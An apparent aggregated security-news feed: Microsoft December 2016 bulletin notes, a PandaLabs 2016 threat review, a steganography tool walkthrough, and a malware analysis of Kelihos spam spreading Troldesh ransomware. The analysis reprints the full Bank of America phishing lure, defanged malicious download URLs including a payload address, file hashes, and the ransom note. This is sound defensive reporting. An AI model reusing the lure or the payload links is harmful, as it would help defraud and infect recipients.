Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: The Windows Virtual Hard Disk Driver improperly handles user access to certain files. An attacker can manipulate files in locations not intended to be available to the user by exploiting this vulnerability.

MS16-152 – Important: Security Update for Windows Kernel (3199709) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: The security update addresses the vulnerability by helping to ensure the kernel API correctly enforces access controls applied to this information. This security update resolves a vulnerability in Microsoft Windows. An information disclosure vulnerability exists when the Windows Kernel improperly handles objects in memory.

MS16-134 – Important: Security Update for Common Log File System Driver (3193706) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Bulletin publish Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerability could allow elevation of privilege when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. In a local attack scenario, an attacker could exploit these vulnerabilities by running a specially crafted application to take complete control over the affected system. An attacker who successfully exploits this vulnerability could run processes in an elevated context.

MS16-153 – Important: Security Update for Common Log File System Driver (3207328) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow Information Disclosure when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. In a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to bypass security measures on the affected system allowing further exploitation.

MS16-131 – Critical: Security Update for Microsoft Video Control (3199151) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution when Microsoft Video Control fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. However, an attacker must first convince a user to open either a specially crafted file or a program from either a webpage or an email message.

MS16-132 – Critical: Security Update for Microsoft Graphics Component (3199120) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe being of the vulnerabilities could allow a remote code execution vulnerability exists when the Windows Animation Manager improperly handles objects in memory if a user visits a malicious webpage. An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. This security update is rated Critical for all supported releases of Microsoft Windows. For more information, see the Affected Software and Vulnerability Severity Ratings section.

MS16-118 – Critical: Cumulative Security Update for Internet Explorer (3192887) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393 - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-130 – Critical: Security Update for Microsoft Windows (3199172) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if a locally authenticated attacker runs a specially crafted application.

MS16-139 – Important: Security Update for Windows Kernel (3199720) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application to access sensitive information. A locally authenticated attacker could attempt to exploit this vulnerability by running a specially crafted application. An attacker can gain access to information not intended to be available to the user by using this method.

MS16-135 – Important: Security Update for Windows Kernel-Mode Drivers (3199135) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

Cyber Security Predictions for 2017

Pandalabs-summer16

Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016

art-blog


Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.

smartphones-blog


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.

cybersecurity3


Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.

pandasecurity-punkeyPOS-principal1


POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.

blog


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Ransomware

Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Companies

Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


DDoS

The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


Mobile Phones

The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


Cyberwarfare

We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

Toolsmith – GSE Edition: Image Steganography & StegExpose

Cross-posted on the Internet Storm Center Diary.

Updated with contest winners 14 DEC. Congrats to:
Chrissy @SecAssistance
Owen Yang @HomingFromWork
Paul Craddy @pcraddy
Mason Pokladnik - Fellow STI grad
Elliot Harbin @klax0ff

In the last of a three part (Part 1-GCIH, Part 2-GCIA) series focused on tools I revisited during my GSE re-certification process, I thought it'd be timely and relevant to give you a bit of a walkthrough re: steganography tools. Steganography "represents the art and science of hiding information by embedding messages within other, seemingly harmless messages."
Stego has garnered quite a bit of attention again lately as party to both exploitation and exfiltration tactics. On 6 DEC 2016, ESET described millions of victims among readers of popular websites who had been targeted by the Stegano exploit kit hiding in pixels of malicious ads.
The Sucuri blog described credit card swipers in Magento sites on 17 OCT 2016, where attackers used image files as an obfuscation technique to hide stolen details from website owners, in images related to products sold on the victim website.

The GSE certification includes SANS 401 GSEC content, and Day 4 of the GSEC class content includes some time on steganography with the Image Steganography tool. Tools for steganographic creation are readily available, but a bit dated, including Image Steganography, last updated in 2011, and OpenStego, last updated in 2015. There are other older, command-line tools, but these two are really straightforward GUI-based options. Open source or free stego detection tools are unfortunately really dated and harder to find as a whole, unless you're a commercial tool user. StegExpose is one of a few open options that's fairly current (2015) and allows you to conduct steganalysis to detect LSB steganography in images. The LSB is the lowest significant bit in the byte value of the image pixel and LSB-based image steganography embeds the hidden payload in the least significant bits of pixel values of an image. 
Image Steganography uses LSB steganography, making this a perfect opportunity to pit one against the other.
Download Image Steganography from Codeplex, then run Image Steganography Setup.exe. Run Image Steganography after installation and select a PNG for your image. You can then type text you'd like to embed, or input data from a file. I chose wtf.png for my image, and rr.ps1 as my input file. I chose to write out the resulting stego sample to wtf2.png, as seen in Figure 1.

Figure 1: Image Steganography
This process in reverse to decode a message is just as easy. Select the decode radio button, and the UI will switch to decode mode. I dragged the wtf2.png file I'd just created, and opted to write the ouput to the same directory, as seen in Figure 2.
Figure 2: wtf.png decoded

Pretty simple, and the extracted rr.ps1 file was unchanged from the original embedded file.
Now, will StegExpose detect this file as steganographic? Download StegExpose from Github, unpack master.zip, and navigate to the resulting directory from a command prompt. Run StegExpose.jar against the directory with your steganographic image as follows: java -jar StegExpose.jar c:\tmp\output. Sure enough, steganography confirmed as seen in Figure 3.
Figure 3: StegExpose
Not bad, right? Easy operations on both sides of the equation.

And now for a little contest. Five readers who email me via russ at holisticinfosec dot org and give me the most precise details regarding what I specifically hid in wtf2.png get a shout out here and $5 Starbucks gift cards for a little Christmastime caffeine.  

Contest: wtf2.png
Note: do not run the actual payload, it will annoy you to no end. If you must run it to decipher it, please do so in a VM. It's not malware, but again, it is annoying.

Cheers...until next time.

He Never Thought His Identity Would be Stolen

It was supposed to be a dream vacation. And it really was, until he came back home. When Adam left Poland and returned to New York, his life had become a nightmare.

While exploring the streets of Warsaw, he wasn’t only focused on the sights. His eyes were open and his senses sharp. Having grown up in Brooklyn, he was street smart and knew to watch out for pickpockets. But there was one threat he didn’t see coming.

Adam knew something was wrong as soon as he saw the credit card bills. After all, he’d been traveling, so he knew that the charges made while he was away couldn’t be his. He picked up the phone and called the credit card company. They confirmed what he now already feared – Adam’s identity had been stolen.

As the reality set in that both of his credit cards had been maxed out, Adam was hit with another bombshell: someone had also opened another card in his name. And that meant whoever was behind this crime also had access to his social security number and probably other personal information.

The anger and sadness Adam felt were bad enough, but the helplessness was even worse. There was nothing he could do to stop whoever was doing this to him. That’s the thing about identity theft – it’s a faceless crime and unfortunately most perpetrators get away with it.

Although Adam felt alone, the truth is he’s not. One in ten people will become the victim of an online crime. And many of them happen on public Wi-Fi. Some victims “just” lose money. However, if a hacker gets their hands on key personal information, you can lose way more than that.

We recently asked Adam and other real victims of identity theft to share their stories and tell us how it really feels to have your identity stolen. Watch now as Adam describes how this is definitely not something you want to have to go through.

After the interview, Adam said he hoped his story would make people realize that identity theft is real. It happens every day to people all over. But it doesn’t have to happen to you.

Check the link below to see why public Wi-Fi is so risky and protect yourself with Freedome VPN.

 

NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB,  is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of embedded URLs within the email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduce itself to the world of ransomware by spamming links to Wildfire ransomware followed by CryptFIle2 ransomware in August. Then, it shifted its focus towards different banking trojans such as Panda Zeus, Nymain and Kronos. Now, it took a complete circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypted the files with the extension ".no_more_ransom". Moreover, the URLs spammed were redirected to download a JavaScript file and a Microsoft Word document. This is the first time that Kelihos malware has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using the Credit Debt theme. The most important fact is that some of the URLs were redirected to download a .zip file containing a JavaScript file, while other links download a Microsoft Word document. When writing this blog, most of the URLs were still live. 

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Sincerely Yours,
Bank of America
Customer Relations Department
.

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 
hxxp://eileenparker[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - Pay for Credit Debt when Possible - 
hxxp://thehousepartnership[dot]co[dot]uk/wp-content/themes/twentyten/redirect[dot]php

Subject - Please Settle Credit Arrears Shortly - 
hxxp://chris-smith-web[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://infopro[dot]it/wp-content/themes/twentyeleven/redirect[dot]php

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

URL that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down

Infection by JavaScript has not been an associated behavior with Kelihos. Hence, it can be considered a noticeable change and well-thought out strategy by the bot operators.

Hashes of the JavaScript and Word document are:

    1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs for Microsoft Word documents have been seen before. The document performed in a similar fashion requesting to enable the macros by clicking "Enable Content" aka "Encrypt Me" button. After this process it downloads a payload from the following link:

hxxp://95[.]163[.]127[.]179/777[.]exe
MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
xxxxxxxxxxxxxxxxxxxxx
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
https://www.torproject.org/download/download-easy.html.en
Install it and type the following address into the address bar:
http://cryptsen7fo43rr6.onion/
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:
http://cryptsen7fo43rr6.onion.to/
http://cryptsen7fo43rr6.onion.cab/

